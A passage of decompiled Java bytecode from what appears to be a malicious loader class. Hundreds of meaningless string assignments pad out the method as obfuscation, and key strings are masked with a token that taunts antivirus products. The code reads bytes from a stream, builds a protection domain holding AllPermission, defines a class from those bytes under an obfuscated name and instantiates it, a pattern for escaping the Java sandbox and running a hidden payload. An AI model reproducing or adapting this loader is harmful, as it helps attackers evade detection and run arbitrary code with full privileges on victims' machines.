        //  1072: ldc_w           "jsfgonqipb"
        //  1075: astore          MkvA1ob
        //  1077: ldc_w           "vhmhtrjlml"
        //  1080: astore          WauW1cb
        //  1082: ldc_w           "wzxibdggzu"
        //  1085: astore          ZwrD9iv
        //  1087: ldc_w           "otduoiylit"
        //  1090: astore          TdkA1kq
        //  1092: ldc_w           "qggqoomwmg"
        //  1095: astore          CczF4gc
        //  1097: ldc_w           "bmolbjrdvu"
        //  1100: astore          NvsA2eo
        //  1102: ldc_w           "pdwrmukpsf"
        //  1105: astore          VjuQ6qi
        //  1107: ldc_w           "bdsdeveepc"
        //  1110: astore          SheT6hs
        //  1112: ldc_w           "oizhgkqpsq"
        //  1115: astore          BnsJ8dp
        //  1117: ldc_w           "igvnuqczca"
        //  1120: astore          WqiT4ys
        //  1122: ldc_w           "zeehggysxy"
        //  1125: astore          OryV9lh
        //  1127: ldc_w           "jehecrumin"
        //  1130: astore          ZppM7tf
        //  1132: ldc_w           "cppqrhcpds"
        //  1135: astore          AvrV5kb
        //  1137: ldc_w           "tijhezpwgv"
        //  1140: astore          WqoH8ql
        //  1142: ldc_w           "adlzfcduat"
        //  1145: astore          CqgS6oi
        //  1147: ldc_w           "pxhmzicxcz"
        //  1150: astore          ClhD6zy
        //  1152: ldc_w           "mimjzueimu"
        //  1155: astore          HlaX9kg
        //  1157: ldc_w           "uwubjmybrq"
        //  1160: astore          XwrU5yp
        //  1162: ldc_w           "pdebrxwcwg"
        //  1165: astore          EqsG4fv
        //  1167: ldc_w           "hluwezusfh"
        //  1170: astore          NzoV6oe
        //  1172: ldc_w           "sfllvdeqcf"
        //  1175: astore          IxzG9ob
        //  1177: aload           FUCKYALLHOES1
        //  1179: aload           FUCKYALLHOES2
        //  1181: iconst_0       
        //  1182: iload           j
        //  1184: invokevirtual   java/io/ByteArrayOutputStream.write:([BII)V
        //  1187: aload           FUCKYALLHOES3
        //  1189: aload           FUCKYALLHOES2
        //  1191: invokevirtual   java/io/InputStream.read:([B)I
        //  1194: dup            
        //  1195: istore          j
        //  1197: ifgt            937
        //  1200: ldc_w           "iqvaqzqsjr"
        //  1203: astore          AgpS9xr
        //  1205: ldc_w           "ddumkiuokv"
        //  1208: astore          PudW8nh
        //  1210: ldc_w           "oexlxfbxoh"
        //  1213: astore          IqcM9sh
        //  1215: ldc_w           "ltflicfiqb"
        //  1218: astore          TkxB6pj
        //  1220: ldc_w           "qqmjcrxrrs"
        //  1223: astore          VjpI7qc
        //  1225: ldc_w           "hvmzuwxjxh"
        //  1228: astore          SpoJ3sw
        //  1230: ldc_w           "xfrrfkqzph"
        //  1233: astore          PdmU2rr
        //  1235: ldc_w           "qkeoifmusd"
        //  1238: astore          SxkR4kv
        //  1240: ldc_w           "ibxjkltnxa"
        //  1243: astore          XnxG6gv
        //  1245: ldc_w           "bwmzkjzfxz"
        //  1248: astore          DkcZ6sq
        //  1250: ldc_w           "bxdojnoqrc"
        //  1253: astore          PssF5sw
        //  1255: ldc_w           "cyiwtvpdhg"
        //  1258: astore          AjwJ2nx
        //  1260: ldc_w           "fcnpewaidz"
        //  1263: astore          HqwU5rk
        //  1265: ldc_w           "pxcbhtfjfc"
        //  1268: astore          MhnL9ep
        //  1270: ldc_w           "tprxsrlvte"
        //  1273: astore          PxvX5as
        //  1275: ldc_w           "lwnkymwzmq"
        //  1278: astore          ZecP6ny
        //  1280: ldc_w           "clriuhecep"
        //  1283: astore          OqtY7ew
        //  1285: ldc_w           "tsvirhxogx"
        //  1288: astore          FpqX5wb
        //  1290: ldc_w           "hqsmetadbb"
        //  1293: astore          KbmU2ua
        //  1295: ldc_w           "mvvuytjmjr"
        //  1298: astore          DxcW5cp
        //  1300: ldc_w           "pghkfpcmyh"
        //  1303: astore          DszB4cb
        //  1305: ldc_w           "xcgytzwnuw"
        //  1308: astore          WbrW4qs
        //  1310: ldc_w           "jqjokmjxrz"
        //  1313: astore          GdfJ8so
        //  1315: ldc_w           "amueznyodv"
        //  1318: astore          UhsO7eg
        //  1320: ldc_w           "ccyygvbhtm"
        //  1323: astore          SgjK7px
        //  1325: ldc_w           "xagrlkvlrw"
        //  1328: astore          NblX3uc
        //  1330: ldc_w           "ficfwclplh"
        //  1333: astore          QyvB6kk
        //  1335: ldc_w           "gxykyjcuea"
        //  1338: astore          AduG4wh
        //  1340: ldc_w           "dqzzojqopm"
        //  1343: astore          VpfT7se
        //  1345: ldc_w           "sxayevarut"
        //  1348: astore          EbfV3ci
        //  1350: ldc_w           "jshrxqbyjt"
        //  1353: astore          FkkZ6ci
        //  1355: ldc_w           "tyoayzngkk"
        //  1358: astore          PctK2uc
        //  1360: ldc_w           "hkepswcefa"
        //  1363: astore          MvoW2vm
        //  1365: ldc_w           "jwckqvxsql"
        //  1368: astore          HmfA8mu
        //  1370: aload           FUCKYALLHOES1
        //  1372: invokevirtual   java/io/ByteArrayOutputStream.toByteArray:()[B
        //  1375: astore          FUCKYALLHOES2
        //  1377: ldc_w           "bmjfxgknss"
        //  1380: astore          BffW2tk
        //  1382: ldc_w           "dbgosckwba"
        //  1385: astore          ViuZ2ap
        //  1387: ldc_w           "yywnmbjfix"
        //  1390: astore          GysX4qg
        //  1392: ldc_w           "ibxhxbvvdp"
        //  1395: astore          LrbS7ni
        //  1397: ldc_w           "ydnmqbuimt"
        //  1400: astore          NhhQ7ov
        //  1402: ldc_w           "wahcpxzeth"
        //  1405: astore          ZjsC6jb
        //  1407: ldc_w           "hodopiflvn"
        //  1410: astore          UvoH7fu
        //  1412: ldc_w           "xiladdcsiy"
        //  1415: astore          BrhG9bt
        //  1417: ldc_w           "zpmxrueclj"
        //  1420: astore          IraL7vq
        //  1422: ldc_w           "hkeheoqyre"
        //  1425: astore          XomO5uq
        //  1427: ldc_w           "olksioyhtx"
        //  1430: astore          QycH6cy
        //  1432: ldc_w           "hnzbqzeorr"
        //  1435: astore          RsaZ3lr
        //  1437: ldc_w           "gbmrnptjaj"
        //  1440: astore          FbuR4sy
        //  1442: ldc_w           "ooxyagbgpv"
        //  1445: astore          VsuC8my
        //  1447: ldc_w           "gfwhaiumcd"
        //  1450: astore          ZliX7rp
        //  1452: ldc_w           "fubnvwlpaq"
        //  1455: astore          VzhE1fj
        //  1457: ldc_w           "rtdioiafzh"
        //  1460: astore          BwwL2cj
        //  1462: ldc_w           "pltoiuvchr"
        //  1465: astore          YtwQ7gx
        //  1467: ldc_w           "uayshkogso"
        //  1470: astore          XcgR8ly
        //  1472: ldc_w           "yuepvhmcfq"
        //  1475: astore          XemN1iq
        //  1477: ldc_w           "nljhddlhfs"
        //  1480: astore          KpgC2tl
        //  1482: ldc_w           "jnrihnclzl"
        //  1485: astore          KgxY8xv
        //  1487: ldc_w           "sbrbhaynse"
        //  1490: astore          AoyR7wp
        //  1492: ldc_w           "ipsgjkgrqz"
        //  1495: astore          EzcY6lq
        //  1497: ldc_w           "oxfuvgixvu"
        //  1500: astore          CeeK3mu
        //  1502: ldc_w           "zylwpadvfh"
        //  1505: astore          OudT9wv
        //  1507: ldc_w           "bbdmpohvjw"
        //  1510: astore          NdxT7ao
        //  1512: ldc_w           "dakrcxtpfh"
        //  1515: astore          DdaB3cj
        //  1517: ldc_w           "psmywcghmj"
        //  1520: astore          KgmM5tw
        //  1522: ldc_w           "bmozxqgppm"
        //  1525: astore          OviB4to
        //  1527: ldc_w           "fcbaefxvas"
        //  1530: astore          DbhB2xr
        //  1532: ldc_w           "nxdmhtlpna"
        //  1535: astore          BjgD4in
        //  1537: ldc_w           "zcrxjwvlev"
        //  1540: astore          NhxJ3nk
        //  1542: ldc_w           "drbjwrfajj"
        //  1545: astore          KglD7xj
        //  1547: ldc_w           "rgxekcpiwb"
        //  1550: astore          SdwG1xf
        //  1552: ldc_w           "vymwiuyekw"
        //  1555: astore          KkfF4cr
        //  1557: ldc_w           "lintinavir"
        //  1560: astore          HgiM2mo
        //  1562: ldc_w           "jarnlheakb"
        //  1565: astore_w        256
        //  1569: new             Ljava/net/URL;
        //  1572: dup            
        //  1573: ldc_w           "FUCKYOUAVASTANDOTHERSHITfFUCKYOUAVASTANDOTHERSHITiFUCKYOUAVASTANDOTHERSHITlFUCKYOUAVASTANDOTHERSHITeFUCKYOUAVASTANDOTHERSHIT:FUCKYOUAVASTANDOTHERSHIT/FUCKYOUAVASTANDOTHERSHIT/FUCKYOUAVASTANDOTHERSHIT/FUCKYOUAVASTANDOTHERSHIT"
        //  1576: ldc_w           "FUCKYOUAVASTANDOTHERSHIT"
        //  1579: ldc_w           ""
        //  1582: invokevirtual   java/lang/String.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;
        //  1585: invokespecial   java/net/URL.<init>:(Ljava/lang/String;)V
        //  1588: astore_w        257
        //  1592: ldc_w           "rkqipeqsag"
        //  1595: astore_w        258
        //  1599: ldc_w           "zhpyoyldil"
        //  1602: astore_w        259
        //  1606: ldc_w           "bstjztcnra"
        //  1609: astore_w        260
        //  1613: ldc_w           "mgbdpyqyuy"
        //  1616: astore_w        261
        //  1620: ldc_w           "xvwsddnozw"
        //  1623: astore_w        262
        //  1627: ldc_w           "ftytbenjyz"
        //  1630: astore_w        263
        //  1634: ldc_w           "eyqwcgdbgg"
        //  1637: astore_w        264
        //  1641: ldc_w           "pwdakrnonm"
        //  1644: astore_w        265
        //  1648: ldc_w           "hlljyuiyud"
        //  1651: astore_w        266
        //  1655: ldc_w           "saxvqipeyt"
        //  1658: astore_w        267
        //  1662: ldc_w           "lshaawjfza"
        //  1665: astore_w        268
        //  1669: ldc_w           "mytmelkjdq"
        //  1672: astore_w        269
        //  1676: ldc_w           "nhvyaudeyl"
        //  1679: astore_w        270
        //  1683: ldc_w           "tgbrhcacll"
        //  1686: astore_w        271
        //  1690: ldc_w           "scnrsawpyl"
        //  1693: astore_w        272
        //  1697: ldc_w           "jfprqgcqyo"
        //  1700: astore_w        273
        //  1704: ldc_w           "dsfkmfzlnz"
        //  1707: astore_w        274
        //  1711: ldc_w           "dtnhbzotcm"
        //  1714: astore_w        275
        //  1718: ldc_w           "eyrtzxmvgf"
        //  1721: astore_w        276
        //  1725: ldc_w           "cpjvhetqwj"
        //  1728: astore_w        277
        //  1732: ldc_w           "jxmnmcbpgt"
        //  1735: astore_w        278
        //  1739: ldc_w           "acohmctwho"
        //  1742: astore_w        279
        //  1746: ldc_w           "vyvuqonill"
        //  1749: astore_w        280
        //  1753: ldc_w           "balosbqzdm"
        //  1756: astore_w        281
        //  1760: ldc_w           "rjddbonidl"
        //  1763: astore_w        282
        //  1767: ldc_w           "ycguvtfgtf"
        //  1770: astore_w        283
        //  1774: ldc_w           "gjukiqexvx"
        //  1777: astore_w        284
        //  1781: ldc_w           "pyzgbrzibv"
        //  1784: astore_w        285
        //  1788: ldc_w           "whznefzbvd"
        //  1791: astore_w        286
        //  1795: ldc_w           "jxudiyfbxz"
        //  1798: astore_w        287
        //  1802: ldc_w           "rwachikrjo"
        //  1805: astore_w        288
        //  1809: ldc_w           "ihzeyvwdpk"
        //  1812: astore_w        289
        //  1816: ldc_w           "wstjifjzkq"
        //  1819: astore_w        290
        //  1823: ldc_w           "arepyzkfyx"
        //  1826: astore_w        291
        //  1830: ldc_w           "wzibkznmyr"
        //  1833: astore_w        292
        //  1837: ldc_w           "svtectjsvo"
        //  1840: astore_w        293
        //  1844: ldc_w           "jnzgucqzxm"
        //  1847: astore_w        294
        //  1851: ldc_w           "bfxkxmqnia"
        //  1854: astore_w        295
        //  1858: ldc_w           "movqzgqsys"
        //  1861: astore_w        296
        //  1865: ldc_w           "dfcckxngng"
        //  1868: astore_w        297
        //  1872: ldc_w           "kdqfbjfwhi"
        //  1875: astore_w        299
        //  1879: ldc_w           "bvyfxbhsjd"
        //  1882: astore_w        300
        //  1886: ldc_w           "favhzvpacm"
        //  1889: astore_w        301
        //  1893: ldc_w           "zvxkynxfdo"
        //  1896: astore_w        302
        //  1900: ldc_w           "qrqqyfacko"
        //  1903: astore_w        303
        //  1907: ldc_w           "apqjubqiyh"
        //  1910: astore_w        304
        //  1914: ldc_w           "jpfekuzepg"
        //  1917: astore_w        305
        //  1921: ldc_w           "gfyzmhqzxh"
        //  1924: astore_w        306
        //  1928: ldc_w           "bdyvqpxhto"
        //  1931: astore_w        307
        //  1935: ldc_w           "uulvhuicim"
        //  1938: astore_w        308
        //  1942: ldc_w           "bofostyicx"
        //  1945: astore_w        309
        //  1949: ldc_w           "xfznicowdd"
        //  1952: astore_w        310
        //  1956: ldc_w           "nmelzfpmyf"
        //  1959: astore_w        311
        //  1963: ldc_w           "zmdrryijix"
        //  1966: astore_w        312
        //  1970: ldc_w           "obrazlravf"
        //  1973: astore_w        313
        //  1977: ldc_w           "jshyiohpue"
        //  1980: astore_w        314
        //  1984: ldc_w           "vjwoutrpjj"
        //  1987: astore_w        315
        //  1991: ldc_w           "fzawmaiqif"
        //  1994: astore_w        316
        //  1998: ldc_w           "tbshchalpi"
        //  2001: astore_w        317
        //  2005: ldc_w           "nsvacvqgqh"
        //  2008: astore_w        318
        //  2012: ldc_w           "nasesnzzeq"
        //  2015: astore_w        319
        //  2019: ldc_w           "cporrlysgg"
        //  2022: astore_w        320
        //  2026: ldc_w           "nhcrxwxcur"
        //  2029: astore_w        321
        //  2033: ldc_w           "jcsixoqywr"
        //  2036: astore_w        322
        //  2040: ldc_w           "ovdaralhbj"
        //  2043: astore_w        323
        //  2047: ldc_w           "knyengqoty"
        //  2050: astore_w        324
        //  2054: ldc_w           "wbnmdtptpe"
        //  2057: astore_w        325
        //  2061: ldc_w           "hvtipzedwb"
        //  2064: astore_w        326
        //  2068: ldc_w           "huxzpwicck"
        //  2071: astore_w        327
        //  2075: ldc_w           "vwncwwlgzo"
        //  2078: astore_w        328
        //  2082: ldc_w           "wqwxwmooyt"
        //  2085: astore_w        329
        //  2089: ldc_w           "ehbycvdsin"
        //  2092: astore_w        330
        //  2096: ldc_w           "zacjgffakr"
        //  2099: astore_w        331
        //  2103: ldc_w           "scnowcxfnb"
        //  2106: astore_w        332
        //  2110: ldc_w           "yiqfznpbns"
        //  2113: astore_w        333
        //  2117: ldc_w           "obhcxutdyp"
        //  2120: astore_w        334
        //  2124: ldc_w           "bqamtqpeho"
        //  2127: astore_w        335
        //  2131: ldc_w           "sswrulfqev"
        //  2134: astore_w        336
        //  2138: ldc_w           "crwztnhbwf"
        //  2141: astore_w        337
        //  2145: ldc_w           "bqppycmpba"
        //  2148: astore_w        338
        //  2152: ldc_w           "dwftdwujbm"
        //  2155: astore_w        339
        //  2159: ldc_w           "omfroglopf"
        //  2162: astore_w        340
        //  2166: ldc_w           "giexhofrwg"
        //  2169: astore_w        341
        //  2173: ldc_w           "qmxajmakgy"
        //  2176: astore_w        342
        //  2180: ldc_w           "kdsyptvcoc"
        //  2183: astore_w        343
        //  2187: iconst_0       
        //  2188: anewarray       Ljava/security/cert/Certificate;
        //  2191: astore_w        344
        //  2195: ldc_w           "lwuuagwptb"
        //  2198: astore_w        345
        //  2202: ldc_w           "clpfhwwgph"
        //  2205: astore_w        346
        //  2209: ldc_w           "ldcwdjozjd"
        //  2212: astore_w        347
        //  2216: ldc_w           "tpmjfpbhsb"
        //  2219: astore_w        348
        //  2223: ldc_w           "bcqqnryksi"
        //  2226: astore_w        349
        //  2230: ldc_w           "lpjzmjpskw"
        //  2233: astore_w        350
        //  2237: ldc_w           "ociyoechsl"
        //  2240: astore_w        351
        //  2244: ldc_w           "iydwpjyigj"
        //  2247: astore_w        352
        //  2251: ldc_w           "yvothgnydu"
        //  2254: astore_w        353
        //  2258: ldc_w           "ldleprjjaq"
        //  2261: astore_w        354
        //  2265: ldc_w           "rswodjashu"
        //  2268: astore_w        355
        //  2272: ldc_w           "hzknjkilog"
        //  2275: astore_w        356
        //  2279: ldc_w           "osclwvbneb"
        //  2282: astore_w        357
        //  2286: ldc_w           "bqhkhpcsrx"
        //  2289: astore_w        358
        //  2293: ldc_w           "hqshlzvnlr"
        //  2296: astore_w        359
        //  2300: ldc_w           "ymgwddqrvt"
        //  2303: astore_w        360
        //  2307: ldc_w           "tguczmunhj"
        //  2310: astore_w        361
        //  2314: ldc_w           "oqnuwnzwgf"
        //  2317: astore_w        362
        //  2321: ldc_w           "ukzqbeyrlj"
        //  2324: astore_w        363
        //  2328: ldc_w           "iwcjyxleeq"
        //  2331: astore_w        364
        //  2335: ldc_w           "afdcdhcnbv"
        //  2338: astore_w        365
        //  2342: ldc_w           "jnfgashuis"
        //  2345: astore_w        366
        //  2349: ldc_w           "xsjpkxjqrt"
        //  2352: astore_w        367
        //  2356: ldc_w           "ultexafkuf"
        //  2359: astore_w        368
        //  2363: ldc_w           "xuvfzopape"
        //  2366: astore_w        369
        //  2370: ldc_w           "zqimgjnlaq"
        //  2373: astore_w        370
        //  2377: ldc_w           "citxpluepb"
        //  2380: astore_w        371
        //  2384: ldc_w           "iqjpupoygm"
        //  2387: astore_w        372
        //  2391: ldc_w           "lhkrudvdnp"
        //  2394: astore_w        373
        //  2398: ldc_w           "igcfqaixrl"
        //  2401: astore_w        374
        //  2405: ldc_w           "trfdulcgwx"
        //  2408: astore_w        375
        //  2412: ldc_w           "hzgtxchmhu"
        //  2415: astore_w        376
        //  2419: ldc_w           "bgphnhweec"
        //  2422: astore_w        377
        //  2426: ldc_w           "kpjkwghvea"
        //  2429: astore_w        378
        //  2433: ldc_w           "vppsyqtjkd"
        //  2436: astore_w        379
        //  2440: new             Ljava/security/Permissions;
        //  2443: dup            
        //  2444: invokespecial   java/security/Permissions.<init>:()V
        //  2447: astore_w        380
        //  2451: ldc_w           "mzjemnovvu"
        //  2454: astore_w        381
        //  2458: ldc_w           "aobvdnbnyb"
        //  2461: astore_w        382
        //  2465: ldc_w           "xeyxgdcffd"
        //  2468: astore_w        383
        //  2472: ldc_w           "qpnrdnivsd"
        //  2475: astore_w        384
        //  2479: ldc_w           "dggecyscsn"
        //  2482: astore_w        385
        //  2486: ldc_w           "eecckomqeh"
        //  2489: astore_w        386
        //  2493: ldc_w           "zlsssdoisp"
        //  2496: astore_w        387
        //  2500: ldc_w           "cendzgtrqz"
        //  2503: astore_w        388
        //  2507: ldc_w           "eggepcetsh"
        //  2510: astore_w        389
        //  2514: ldc_w           "xgozcwqymu"
        //  2517: astore_w        390
        //  2521: ldc_w           "vakntjprrs"
        //  2524: astore_w        391
        //  2528: ldc_w           "ncsngcvros"
        //  2531: astore_w        392
        //  2535: ldc_w           "ylobgfliia"
        //  2538: astore_w        393
        //  2542: ldc_w           "pwzpaoaxxc"
        //  2545: astore_w        394
        //  2549: ldc_w           "gpphhuxjto"
        //  2552: astore_w        395
        //  2556: ldc_w           "ehjxopkmbl"
        //  2559: astore_w        396
        //  2563: ldc_w           "osakkqmiux"
        //  2566: astore_w        397
        //  2570: ldc_w           "fhmquuqxoy"
        //  2573: astore_w        398
        //  2577: ldc_w           "ahhfpypkgy"
        //  2580: astore_w        399
        //  2584: ldc_w           "kbeaawljdv"
        //  2587: astore_w        400
        //  2591: ldc_w           "qgudbmybal"
        //  2594: astore_w        401
        //  2598: ldc_w           "wmqoohopzz"
        //  2601: astore_w        402
        //  2605: ldc_w           "vazkawyxab"
        //  2608: astore_w        403
        //  2612: ldc_w           "wystidugvk"
        //  2615: astore_w        404
        //  2619: aload_w         localPermissions
        //  2623: new             Ljava/security/AllPermission;
        //  2626: dup            
        //  2627: invokespecial   java/security/AllPermission.<init>:()V
        //  2630: invokevirtual   java/security/Permissions.add:(Ljava/security/Permission;)V
        //  2633: ldc_w           "mrnqkvjjig"
        //  2636: astore_w        405
        //  2640: ldc_w           "fketqmeifm"
        //  2643: astore_w        406
        //  2647: ldc_w           "fsctrgspjc"
        //  2650: astore_w        407
        //  2654: ldc_w           "jtdcqjyorr"
        //  2657: astore_w        408
        //  2661: ldc_w           "eiofoqaijw"
        //  2664: astore_w        409
        //  2668: ldc_w           "ptspxpftlf"
        //  2671: astore_w        410
        //  2675: ldc_w           "iavicnnkmx"
        //  2678: astore_w        411
        //  2682: ldc_w           "cvamxqguge"
        //  2685: astore_w        412
        //  2689: ldc_w           "svboixpxia"
        //  2692: astore_w        413
        //  2696: ldc_w           "smbpiyivqo"
        //  2699: astore_w        414
        //  2703: ldc_w           "onhbhimkaw"
        //  2706: astore_w        415
        //  2710: ldc_w           "ykifturmfe"
        //  2713: astore_w        416
        //  2717: ldc_w           "jobwfsjidi"
        //  2720: astore_w        417
        //  2724: ldc_w           "hxzicytfkq"
        //  2727: astore_w        418
        //  2731: ldc_w           "aboaqljqrp"
        //  2734: astore_w        419
        //  2738: ldc_w           "vzdbmjfkon"
        //  2741: astore_w        420
        //  2745: ldc_w           "osocxqdxqt"
        //  2748: astore_w        421
        //  2752: ldc_w           "gytyyfxjkc"
        //  2755: astore_w        422
        //  2759: ldc_w           "pieoyjmaii"
        //  2762: astore_w        423
        //  2766: ldc_w           "fdhkgcjxux"
        //  2769: astore_w        424
        //  2773: ldc_w           "lxrtehsnkf"
        //  2776: astore_w        425
        //  2780: ldc_w           "eghnochkjg"
        //  2783: astore_w        426
        //  2787: ldc_w           "gvmrrxxhub"
        //  2790: astore_w        427
        //  2794: ldc_w           "psittekbqi"
        //  2797: astore_w        428
        //  2801: ldc_w           "sewqugnovi"
        //  2804: astore_w        429
        //  2808: ldc_w           "suieiavkdq"
        //  2811: astore_w        430
        //  2815: ldc_w           "cqsgpvklfi"
        //  2818: astore_w        431
        //  2822: ldc_w           "jydwyjbrow"
        //  2825: astore_w        432
        //  2829: ldc_w           "wuyqmylwnf"
        //  2832: astore_w        433
        //  2836: ldc_w           "myieymvoac"
        //  2839: astore_w        434
        //  2843: ldc_w           "wvpkllklty"
        //  2846: astore_w        435
        //  2850: ldc_w           "amcyhivxdc"
        //  2853: astore_w        436
        //  2857: ldc_w           "pvkrpnjdgj"
        //  2860: astore_w        437
        //  2864: ldc_w           "ochfzeawgy"
        //  2867: astore_w        438
        //  2871: ldc_w           "zgwkeqoawu"
        //  2874: astore_w        439
        //  2878: ldc_w           "ixngneahca"
        //  2881: astore_w        440
        //  2885: ldc_w           "tmuxmrlaao"
        //  2888: astore_w        441
        //  2892: ldc_w           "ziqzuesebr"
        //  2895: astore_w        442
        //  2899: ldc_w           "ifusqiwqqy"
        //  2902: astore_w        443
        //  2906: ldc_w           "fqbcgharfl"
        //  2909: astore_w        444
        //  2913: new             Ljava/security/ProtectionDomain;
        //  2916: dup            
        //  2917: new             Ljava/security/CodeSource;
        //  2920: dup            
        //  2921: aload_w         localURL
        //  2925: aload_w         arrayOfCertificate
        //  2929: invokespecial   java/security/CodeSource.<init>:(Ljava/net/URL;[Ljava/security/cert/Certificate;)V
        //  2932: aload_w         localPermissions
        //  2936: invokespecial   java/security/ProtectionDomain.<init>:(Ljava/security/CodeSource;Ljava/security/PermissionCollection;)V
        //  2939: astore_w        445
        //  2943: ldc_w           "wdbkpexlav"
        //  2946: astore_w        446
        //  2950: ldc_w           "nyprmojwug"
        //  2953: astore_w        447
        //  2957: ldc_w           "slpjflazzv"
        //  2960: astore_w        448
        //  2964: ldc_w           "ahrdabxwnv"
        //  2967: astore_w        449
        //  2971: ldc_w           "ebnbmjmhuw"
        //  2974: astore_w        450
        //  2978: ldc_w           "zijxcjxmzn"
        //  2981: astore_w        451
        //  2985: ldc_w           "hwvigfsrwa"
        //  2988: astore_w        452
        //  2992: ldc_w           "lcaetewbjb"
        //  2995: astore_w        453
        //  2999: ldc_w           "kzhuolphhn"
        //  3002: astore_w        454
        //  3006: ldc_w           "vflxulpqui"
        //  3009: astore_w        455
        //  3013: ldc_w           "zdklcqcojw"
        //  3016: astore_w        456
        //  3020: ldc_w           "ummbkzgrcz"
        //  3023: astore_w        457
        //  3027: ldc_w           "uzvhgtwlly"
        //  3030: astore_w        458
        //  3034: ldc_w           "zccccqkokk"
        //  3037: astore_w        459
        //  3041: ldc_w           "yewtwjjolw"
        //  3044: astore_w        460
        //  3048: ldc_w           "kklzkcmank"
        //  3051: astore_w        461
        //  3055: ldc_w           "exukghhnhm"
        //  3058: astore_w        462
        //  3062: ldc_w           "hnggilcbef"
        //  3065: astore_w        463
        //  3069: ldc_w           "hwthtapnrt"
        //  3072: astore_w        464
        //  3076: ldc_w           "cmriqnwdxu"
        //  3079: astore_w        465
        //  3083: ldc_w           "crspqlerub"
        //  3086: astore_w        466
        //  3090: ldc_w           "iyfigrqllw"
        //  3093: astore_w        467
        //  3097: ldc_w           "mvqfonmuqv"
        //  3100: astore_w        468
        //  3104: ldc_w           "lrzoeihwas"
        //  3107: astore_w        469
        //  3111: ldc_w           "slelxatgdd"
        //  3114: astore_w        470
        //  3118: ldc_w           "lxnpgctiwn"
        //  3121: astore_w        471
        //  3125: ldc_w           "tsjjlotjst"
        //  3128: astore_w        472
        //  3132: aload_0         /* this */
        //  3133: ldc_w           "FUCKYOUAVASTANDOTHERSHITcFUCKYOUAVASTANDOTHERSHITjFUCKYOUAVASTANDOTHERSHITkFUCKYOUAVASTANDOTHERSHITyFUCKYOUAVASTANDOTHERSHITxFUCKYOUAVASTANDOTHERSHITlFUCKYOUAVASTANDOTHERSHITbFUCKYOUAVASTANDOTHERSHITrFUCKYOUAVASTANDOTHERSHITfFUCKYOUAVASTANDOTHERSHITrFUCKYOUAVASTANDOTHERSHITwFUCKYOUAVASTANDOTHERSHITaFUCKYOUAVASTANDOTHERSHITxFUCKYOUAVASTANDOTHERSHITbFUCKYOUAVASTANDOTHERSHITyFUCKYOUAVASTANDOTHERSHITcFUCKYOUAVASTANDOTHERSHIT"
        //  3136: ldc_w           "FUCKYOUAVASTANDOTHERSHIT"
        //  3139: ldc_w           ""
        //  3142: invokevirtual   java/lang/String.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;
        //  3145: aload           FUCKYALLHOES2
        //  3147: iconst_0       
        //  3148: aload           FUCKYALLHOES2
        //  3150: arraylength    
        //  3151: aload_w         localProtectionDomain
        //  3155: invokevirtual   d3bbd09724b6936399.defineClass:(Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class;
        //  3158: astore_w        298
        //  3162: ldc_w           "pinujcytkn"
        //  3165: astore_w        473
        //  3169: ldc_w           "wasjkglogx"
        //  3172: astore_w        474
        //  3176: ldc_w           "agynhiqotq"
        //  3179: astore_w        475
        //  3183: ldc_w           "sdxrtmgrpn"
        //  3186: astore_w        476
        //  3190: ldc_w           "clyartsyht"
        //  3193: astore_w        477
        //  3197: ldc_w           "irlpwphvnt"
        //  3200: astore_w        478
        //  3204: ldc_w           "exzawzedlw"
        //  3207: astore_w        479
        //  3211: ldc_w           "qoyucdgpck"
        //  3214: astore_w        480
        //  3218: ldc_w           "rtqiofoswu"
        //  3221: astore_w        481
        //  3225: ldc_w           "gnnojfjkve"
        //  3228: astore_w        482
        //  3232: ldc_w           "kzilcoiwxx"
        //  3235: astore_w        483
        //  3239: ldc_w           "osexgpooxw"
        //  3242: astore_w        484
        //  3246: ldc_w           "ewesdavcmw"
        //  3249: astore_w        485
        //  3253: ldc_w           "eugjfrfgbo"
        //  3256: astore_w        486
        //  3260: ldc_w           "erdihxyvrp"
        //  3263: astore_w        487
        //  3267: ldc_w           "kmjvfqhxxr"
        //  3270: astore_w        488
        //  3274: ldc_w           "zrxkirnuif"
        //  3277: astore_w        489
        //  3281: ldc_w           "httrcaeidp"
        //  3284: astore_w        490
        //  3288: ldc_w           "crhsqlztje"
        //  3291: astore_w        491
        //  3295: ldc_w           "thupqywuww"
        //  3298: astore_w        492
        //  3302: ldc_w           "fpygjnvijs"
        //  3305: astore_w        493
        //  3309: ldc_w           "zytqakuway"
        //  3312: astore_w        494
        //  3316: ldc_w           "ufckmyahhx"
        //  3319: astore_w        495
        //  3323: ldc_w           "vrifeigrtc"
        //  3326: astore_w        496
        //  3330: ldc_w           "rgpniuyoqo"
        //  3333: astore_w        497
        //  3337: ldc_w           "ilxmhxgkma"
        //  3340: astore_w        498
        //  3344: ldc_w           "lvuxfcxamf"
        //  3347: astore_w        499
        //  3351: ldc_w           "falgaxmpoh"
        //  3354: astore_w        500
        //  3358: ldc_w           "nabrwadtou"
        //  3361: astore_w        501
        //  3365: ldc_w           "gdtkuekwzd"
        //  3368: astore_w        502
        //  3372: ldc_w           "ijiqgstqqy"
        //  3375: astore_w        503
        //  3379: ldc_w           "xcybtmuyac"
        //  3382: astore_w        504
        //  3386: ldc_w           "oubhzojfrr"
        //  3389: astore_w        505
        //  3393: ldc_w           "evgyyhwusm"
        //  3396: astore_w        506
        //  3400: ldc_w           "faiwjfbzdn"
        //  3403: astore_w        507
        //  3407: ldc_w           "xrikdnhwqj"
        //  3410: astore_w        508
        //  3414: ldc_w           "lcwfrmqkoa"
        //  3417: astore_w        509
        //  3421: ldc_w           "pqswohdcur"
        //  3424: astore_w        510
        //  3428: ldc_w           "xwhfiqbkyw"
        //  3431: astore_w        511
        //  3435: ldc_w           "qdtmkkznaq"
        //  3438: astore_w        512
        //  3442: ldc_w           "nwtsgeiqvj"
        //  3445: astore_w        513
        //  3449: ldc_w           "qeaflwakyk"
        //  3452: astore_w        514
        //  3456: ldc_w           "brvykusxbr"
        //  3459: astore_w        515
        //  3463: ldc_w           "cadpkcbihx"
        //  3466: astore_w        516
        //  3470: aload_w         FUCKYABITCH
        //  3474: invokevirtual   java/lang/Class.newInstance:()Ljava/lang/Object;
        //  3477: pop            
        //  3478: return         
        //    Exceptions:
        //  throws java.io.IOException
        //  throws java.lang.InstantiationException
        //  throws java.lang.IllegalAccessException
        //    LocalVariableTable:
        //  Start  Length  Slot  Name                   Signature
        //  -----  ------  ----  ---------------------  ---------------------------------
